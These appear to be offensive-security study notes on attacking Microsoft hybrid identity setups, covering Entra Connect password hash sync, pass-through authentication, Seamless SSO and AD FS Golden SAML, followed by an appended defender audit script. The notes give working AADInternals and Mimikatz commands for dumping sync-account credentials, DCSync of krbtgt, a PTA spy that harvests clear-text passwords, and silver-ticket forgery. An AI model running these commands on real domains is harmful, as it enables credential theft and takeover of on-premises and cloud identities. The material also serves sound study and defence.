Hybrid Identity
Organizations have resources, devices and applications both on-premises and in the cloud. Many enterprises use their on-prem AD identities to access Azure applications to avoid managing separate identities in both places.
A hybrid identity is a single user identity used for authentication and authorization to all resources, regardless of where they are located.
Entra Connect
An on-premises AD can be integrated with Entra ID using Entra Connect with the following methods. Every method supports Single Sign-on (SSO):
Password Hash Sync (PHS)
Pass-Through Authentication (PTA)
Federation

PHS (Password Hash Sync)
It syncs users and a hash of their password hashes (not clear-text passwords or the original hashes) from on-prem AD to Entra ID. This is the simplest and most popular method for getting a hybrid identity.
By default, password expiry and account expiry are not reflected in Entra ID. That means a user whose on-prem password has expired can continue to access Azure resources using the old password.
On-prem, an account with the name MSOL_<installationID> is automatically created. This account has replication (DCSync) permissions in the on-prem AD.
Enumerate MSOL users:
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
Once the Entra Connect server is compromised, use the commands below from the AADInternals module to extract the credentials of the MSOL_* and Sync_* accounts in clear text:
Import-Module AADInternals\AADInternals.psd1
Get-AADIntSyncCredentials
Using the creds of the MSOL_* account, we can run DCSync against the on-prem AD:
runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:defeng\krbtgt /domain:defeng.corp /dc:defeng-dc.defeng.corp"'
PTA (Pass-through Authentication)
Microsoft Entra pass-through authentication allows your users to sign in to both on-premises and cloud-based applications using the same passwords. When users sign in using Microsoft Entra ID, this feature validates users' passwords directly against your on-premises Active Directory.

If we compromise a server with the authentication agent running, we can get the credentials of users in plain text. We first need to upload AADInternals.zip (https://github.com/Gerenios/AADInternals). Next, unzip it and run:
Import-Module AADInternals\AADInternals.psd1
Install the PTA agent and collect credentials:
Install-AADIntPTASpy
All passwords are now accepted and credentials are collected to C:\PTASpy\PTASpy.csv
# Get clear-text passwords from users authenticating
Get-AADIntPTASpyLog
Seamless SSO
Entra Seamless SSO automatically signs users in when they are on an on-prem domain-joined machine. There is no need to type passwords to log in to Entra ID and on-prem applications. In the on-prem AD an account named AZUREADSSOACC$ is created. This account's Kerberos decryption key is shared with Entra ID.
The password/key of AZUREADSSOACC$ never changes.
This means that if we can compromise the NTLM hash of this machine account, we can create silver tickets for any synced on-prem user.
First, get the NTLM hash:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:defeng.corp /dc:defeng-dc.defeng.corp"'
We just need the userPrincipalName and SID of the user to create the silver ticket, which can be used from any machine connected to the internet.
Create the silver ticket:
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin1 /sid:S-1-5-21-938785110-3291390659-577725712 /id:1108 /domain:defeng.corp /rc4:<> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
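As an added defender-side example (not part of these notes), the following PowerShell audits the two on-prem conditions the PHS and Seamless SSO sections above depend on: which principals hold replication (DCSync) rights on the domain root, and whether the AZUREADSSOACC$ key has ever been rolled. It assumes the ActiveDirectory RSAT module and a read-only domain account; the function name and the 30-day threshold are assumptions of this example.

```powershell
# Added defender-side audit (not part of the original notes). Assumes the
# ActiveDirectory RSAT module and an account with read access to the domain.
# The 30-day threshold is the recommended Seamless SSO key rollover interval.
Import-Module ActiveDirectory

function Get-HybridIdentityAudit {
    param([int]$SsoKeyMaxAgeDays = 30)
    $findings = @()

    # 1. Who holds directory replication (DCSync) rights on the domain root?
    #    Domain controllers, Administrators and the MSOL_* account are expected;
    #    anything else is a candidate for investigation.
    $replGuids = @(
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
    )
    $domainDn = (Get-ADDomain).DistinguishedName
    $aces = (Get-Acl -Path "AD:\$domainDn").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $replGuids -contains $_.ObjectType.ToString() }
    foreach ($ace in $aces) {
        $who = $ace.IdentityReference.Value
        $expected = $who -match 'MSOL_|Domain Controllers|Administrators|SYSTEM'
        $findings += [pscustomobject]@{
            Check    = 'ReplicationRight'
            Subject  = $who
            Detail   = $ace.ObjectType.ToString()
            Severity = if ($expected) { 'Info' } else { 'High' }
        }
    }

    # 2. Seamless SSO account: a key that is never rolled keeps a stolen hash
    #    usable for silver tickets indefinitely.
    $sso = Get-ADComputer -Filter 'samAccountName -eq "AZUREADSSOACC$"' -Properties PasswordLastSet
    if ($sso) {
        $ageDays = [int]((Get-Date) - $sso.PasswordLastSet).TotalDays
        $findings += [pscustomobject]@{
            Check    = 'SeamlessSsoKeyAge'
            Subject  = $sso.SamAccountName
            Detail   = "PasswordLastSet=$($sso.PasswordLastSet) ($ageDays days ago)"
            Severity = if ($ageDays -gt $SsoKeyMaxAgeDays) { 'High' } else { 'Info' }
        }
    }
    return $findings
}

Get-HybridIdentityAudit | Sort-Object Severity | Format-Table -AutoSize
```

Any ReplicationRight finding marked High, or a SeamlessSsoKeyAge finding older than the threshold, is what the attacks in this section rely on and should be remediated (remove the right, or roll the key with the Entra Connect Seamless SSO PowerShell module).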
Federation
In the case of federation, a trust is established between unrelated parties such as on-prem AD and Entra ID. Users can access cloud applications using their on-prem credentials.

ADFS
AD FS uses a claims-based identity model. Claims are simply statements (for example name, identity, group) made about users that are used primarily for authorizing access to claims-based applications located anywhere on the internet.

A user is identified by the ImmutableID. It is globally unique and stored in Entra ID. The ImmutableID is stored on-prem as ms-DS-ConsistencyGuid for the user and/or can be derived from the GUID of the user.
Golden SAML attack
In AD FS, a SAML response is signed by a token-signing certificate. If the certificate is compromised, it is possible to authenticate to Entra ID as ANY user in Entra ID. The certificate can be extracted from the AD FS server with Domain Admin privileges and then used from an internet-connected machine.
